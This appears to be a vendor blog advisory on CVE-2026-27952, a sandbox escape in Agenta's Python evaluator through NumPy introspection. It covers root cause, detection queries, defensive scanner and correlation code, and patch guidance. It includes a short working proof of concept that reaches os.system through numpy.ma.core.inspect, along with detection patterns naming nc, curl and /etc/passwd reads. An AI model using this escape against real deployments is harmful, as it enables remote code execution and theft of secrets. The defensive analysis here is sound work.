CVE-2026-27952: Agenta Sandbox Flaw Enables Authenticated Users to Achieve Remote Code Execution via NumPy Introspection

Agenta Sandbox Escape via NumPy Introspection

CVE ID: CVE-2026-27952
Affected Product: Agenta API (self-hosted deployments)
Affected Versions: All versions prior to 0.48.1
Severity: High
CVSS v3.1 Base Score: 8.8 (High)
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low (Authenticated user)
User Interaction: None
Scope: Unchanged
Impact: Confidentiality (High), Integrity (High), Availability (High)
Exploitability: High
Exploit Availability: Publicly discussed technique with working proof-of-concept demonstrated in security research

CVE-2026-27952 is a sandbox escape vulnerability in Agenta’s Python code execution feature. The issue allows an authenticated user to bypass RestrictedPython sandbox controls and execute arbitrary system-level commands on the Agenta server by abusing NumPy’s introspection capabilities.


Technical Description

Agenta provides a feature that allows users to execute custom Python code within a restricted execution environment. The sandbox implementation relied on RestrictedPython and enforced import controls to limit dangerous modules.

However, the sandbox configuration mistakenly permitted importing numpy. Within NumPy’s internal structure, the module numpy.ma.core exposes an inspect reference that provides access to Python interpreter internals. Through this object, the global module registry (sys.modules) can be accessed.

Once sys.modules becomes reachable, restricted modules such as os or subprocess can be obtained dynamically, even if direct imports are blocked by the sandbox policy.

This effectively breaks the isolation boundary intended by RestrictedPython and allows arbitrary command execution within the context of the Agenta API server process.

Because execution occurs inside the running API process, the attacker gains access equivalent to the service account running Agenta. In containerized environments, this typically includes:

  • Environment variables (including API keys and secrets)
  • Mounted configuration files
  • Network access from the container
  • Filesystem access permitted to the container
  • Internal service-to-service communication channels

The vulnerability does not require complex chaining. It relies on Python introspection mechanics and insufficient module restrictions.


Root Cause

The vulnerability exists due to:

  1. Overly permissive import allowlisting in the RestrictedPython sandbox.
  2. Failure to account for indirect module access via introspection.
  3. Inadequate isolation of user-supplied code from the host interpreter.
  4. Execution of untrusted code within the same runtime process.

RestrictedPython was assumed to provide sufficient containment, but Python’s dynamic nature allows module traversal through non-obvious paths such as inspect references embedded inside third-party libraries.
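The indirect-access failure described above is something an allowlist maintainer can check for before deployment. The following is an added example (not Agenta's or RestrictedPython's code): it walks each allowlisted module's attribute tree and reports every module object reachable by plain attribute access that is not itself allowlisted, the same path by which the inspect reference inside numpy.ma.core exposed sys. The DANGEROUS set and the fakenp stand-in package are constructed here; point it at your real allowlist and imported modules instead.

```python
import inspect
import types

# Modules whose exposure defeats an import allowlist (assumption: a minimal set
# for a RestrictedPython-style sandbox; extend it for your deployment).
DANGEROUS = {"sys", "os", "subprocess", "builtins", "importlib", "inspect", "ctypes"}


def find_module_leaks(allowlist, roots, max_depth=4):
    """Return {attribute_path: module_name} for every module object reachable
    from a root module by plain attribute access whose name is not allowlisted.
    Dunder attributes are skipped: a RestrictedPython-style guard blocks them."""
    leaks, seen = {}, set()
    stack = [(name, mod, 0) for name, mod in roots.items()]
    while stack:
        path, obj, depth = stack.pop()
        if id(obj) in seen or depth > max_depth:
            continue
        seen.add(id(obj))
        for attr in dir(obj):
            if attr.startswith("__"):
                continue
            try:
                child = getattr(obj, attr)
            except Exception:  # lazy submodule loaders may raise on access
                continue
            if isinstance(child, types.ModuleType):
                child_path = f"{path}.{attr}"
                if child.__name__ not in allowlist:
                    leaks[child_path] = child.__name__
                stack.append((child_path, child, depth + 1))
    return leaks


def dangerous_leaks(allowlist, roots):
    """Only the leaks that hand sandboxed code interpreter internals."""
    return {p: m for p, m in find_module_leaks(allowlist, roots).items() if m in DANGEROUS}


def constructed_numpy_like():
    """Constructed stand-in (not the real NumPy) for the layout the advisory
    describes: package -> ma -> core -> inspect; stdlib inspect binds sys and os."""
    core = types.ModuleType("fakenp.ma.core")
    core.inspect = inspect
    ma = types.ModuleType("fakenp.ma")
    ma.core = core
    top = types.ModuleType("fakenp")
    top.ma = ma
    return top
```

Any entry returned by dangerous_leaks means the allowlist is not an isolation boundary, whatever the direct import policy says.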


Impact

If exploited successfully, the following outcomes are possible:

  • Remote Code Execution (RCE)
  • Arbitrary system command execution
  • Data exfiltration
  • Secret leakage
  • Lateral movement within internal infrastructure
  • Container breakout (if additional misconfigurations exist)
  • Service disruption or data destruction

Any organization exposing Agenta publicly or allowing broad user registration is at elevated risk.


Exploitation Details (Educational)

The exploitation technique relies on:

  1. Importing NumPy inside the sandbox.
  2. Traversing to internal inspection utilities.
  3. Accessing sys.modules.
  4. Retrieving restricted modules such as os.
  5. Invoking system-level functionality.

Conceptual demonstration (simplified for education):

import numpy as np

# Access internal inspect reference
inspect_ref = np.ma.core.inspect

# Reach sys.modules via inspect globals
modules = inspect_ref.__globals__['sys'].modules

# Retrieve os module
os_module = modules['os']

# Execute system command
os_module.system("id")

Attack Scenario

  1. Attacker registers or logs in to Agenta.
  2. Attacker submits custom evaluation code.
  3. Code executes inside sandbox.
  4. NumPy import bypasses intended restrictions.
  5. Introspection exposes system modules.
  6. Arbitrary command execution achieved.
  7. Sensitive information retrieved or server compromised.

Indicators of Compromise (IoCs)

Look for:

  • User-submitted code containing:
    • import numpy
    • numpy.ma.core.inspect
    • __globals__
    • sys.modules
    • os.system
    • subprocess
  • Unexpected shell process creation from the Agenta process
  • Outbound network connections from Agenta host to unknown IPs
  • File reads involving /etc/passwd, /proc, or secret directories
  • Environment variable dumps in logs

Detection Guidance

Log Sources to Monitor

  • Agenta API application logs
  • HTTP request logs (code submission endpoints)
  • Container runtime logs (Docker / Kubernetes)
  • Linux auditd logs
  • EDR telemetry
  • Process creation logs
  • Network flow logs

Detection Queries

Splunk Query – Suspicious Code Submission

index=agenta_logs sourcetype=api_requests
| search request_body="*import numpy*"
OR request_body="*numpy.ma.core.inspect*"
OR request_body="*sys.modules*"
OR request_body="*__globals__*"
| table _time user client_ip request_body

Splunk Query – Suspicious Process Creation

index=os_logs sourcetype=process_creation
| search parent_process="agenta*"
AND (process_name="sh" OR process_name="bash" OR process_name="python" OR process_name="nc" OR process_name="curl")
| table _time host parent_process process_name command_line

Elastic (KQL) – Sandbox Escape Behavior

process.parent.name : "agenta*" and 
process.name : ("sh" or "bash" or "python" or "curl" or "nc")

Microsoft Sentinel (KQL) – Suspicious Python Introspection

AppRequests
| where RequestBody contains "numpy.ma.core.inspect"
or RequestBody contains "sys.modules"
or RequestBody contains "__globals__"

Linux Auditd Rule (Process Execution Monitoring)

-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/python3 -k agenta_exec_monitor

Behavioral Detection Strategy

Instead of only matching strings, it is recommended to correlate:

  1. Code submission event
  2. Followed by process spawn
  3. Followed by outbound connection

Correlation within a 2–5 minute window significantly increases detection accuracy.
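The correlation strategy above, combined with the IoC string list from the previous section, as an added example (not Agenta's code or any SIEM's rule language): it runs over constructed, normalised events whose field names (ts, type, parent, name, cmdline, dst) are assumptions, alerts on a submission followed by an agenta-spawned shell and then an outbound connection inside the window, and uses indicator matches only to raise severity rather than to gate the alert.

```python
from datetime import datetime, timedelta

INDICATORS = ("numpy.ma.core.inspect", "__globals__", "sys.modules", "os.system", "subprocess")
WINDOW = timedelta(minutes=5)  # upper end of the advisory's 2-5 minute window
SHELLS = {"sh", "bash", "python", "nc", "curl"}  # child names from the process queries


def indicator_hits(body):
    """Return the IoC strings present in a submitted code body."""
    return [ioc for ioc in INDICATORS if ioc in body]


def correlate(events):
    """One alert per code submission followed, within WINDOW, by a shell spawn
    from an agenta* parent and then an outbound connection; hits set severity."""
    events = sorted(events, key=lambda e: e["ts"])
    alerts = []
    for i, sub in enumerate(events):
        if sub["type"] != "code_submission":
            continue
        spawn = None
        for ev in events[i + 1:]:
            if ev["ts"] - sub["ts"] > WINDOW:
                break
            if (ev["type"] == "process_spawn" and spawn is None
                    and ev["parent"].startswith("agenta") and ev["name"] in SHELLS):
                spawn = ev
            elif ev["type"] == "net_connect" and spawn is not None:
                hits = indicator_hits(sub["body"])
                alerts.append({"user": sub["user"], "severity": "high" if hits else "medium",
                               "indicators": hits, "spawn": spawn["cmdline"], "dst": ev["dst"]})
                break
    return alerts


# Constructed sample events (not real Agenta logs); field names are assumptions.
T0 = datetime(2026, 3, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    {"ts": T0 - timedelta(minutes=6), "type": "code_submission", "user": "alice",
     "body": "import numpy as np\nprint(np.mean([1, 2, 3]))"},  # outside the window
    {"ts": T0 + timedelta(seconds=10), "type": "code_submission", "user": "bob",
     "body": "result = sum(scores) / len(scores)"},
    {"ts": T0 + timedelta(seconds=20), "type": "code_submission", "user": "mallory",
     "body": "import numpy\nnumpy.ma.core.inspect.__globals__"},
    {"ts": T0 + timedelta(seconds=45), "type": "process_spawn", "parent": "agenta-api",
     "name": "sh", "cmdline": "sh -c id"},
    {"ts": T0 + timedelta(seconds=70), "type": "net_connect", "src": "agenta-api", "dst": "203.0.113.7:4444"},
    {"ts": T0 + timedelta(minutes=30), "type": "process_spawn", "parent": "agenta-api",
     "name": "sh", "cmdline": "sh -c ls"},  # no follow-on connection: no alert
]
```

Every submission inside the window is flagged (here bob's benign one as medium), which is the intended trade-off: the analyst triages by severity instead of trusting a string match that an attacker can trivially rephrase.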


Mitigation

Immediate actions:

  • Upgrade Agenta to version 0.48.1 or later
  • Disable custom code evaluator if not required
  • Restrict evaluator access to trusted users only
  • Apply strict outbound network controls
  • Enforce least privilege container runtime configuration
  • Rotate all credentials accessible to the Agenta service

Patch Information

The vulnerability has been fixed by removing NumPy from the sandbox allowlist and restructuring sandbox execution logic.

Official Patch / Upgrade Link:
https://github.com/Agenta-AI/agenta/releases/tag/v0.48.1

Upgrade to version 0.48.1 or newer immediately.


Hardening Recommendations

  • Do not execute untrusted Python code in-process.
  • Use isolated containers or microVMs for user code execution.
  • Apply seccomp profiles and AppArmor policies.
  • Prevent container privilege escalation.
  • Disable host filesystem mounts unless required.
  • Implement egress filtering.

Risk Assessment

This vulnerability should be treated as a high-priority patch event for any organization using self-hosted Agenta deployments. Because the exploit requires authentication, risk increases significantly when:

  • Public sign-ups are enabled
  • Weak authentication controls exist
  • Shared environments are used
  • Production secrets are mounted inside containers

If exposed to the internet, the system should be assumed exploitable until patched.


Conclusion

CVE-2026-27952 represents a classic sandbox escape caused by underestimating Python’s introspection capabilities. The issue does not rely on advanced exploitation techniques but rather on Python’s dynamic module system and inadequate isolation design.

All vulnerable instances should be upgraded immediately. Logs should be reviewed for suspicious evaluator activity. Secrets accessible to the Agenta runtime should be rotated as a precaution.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.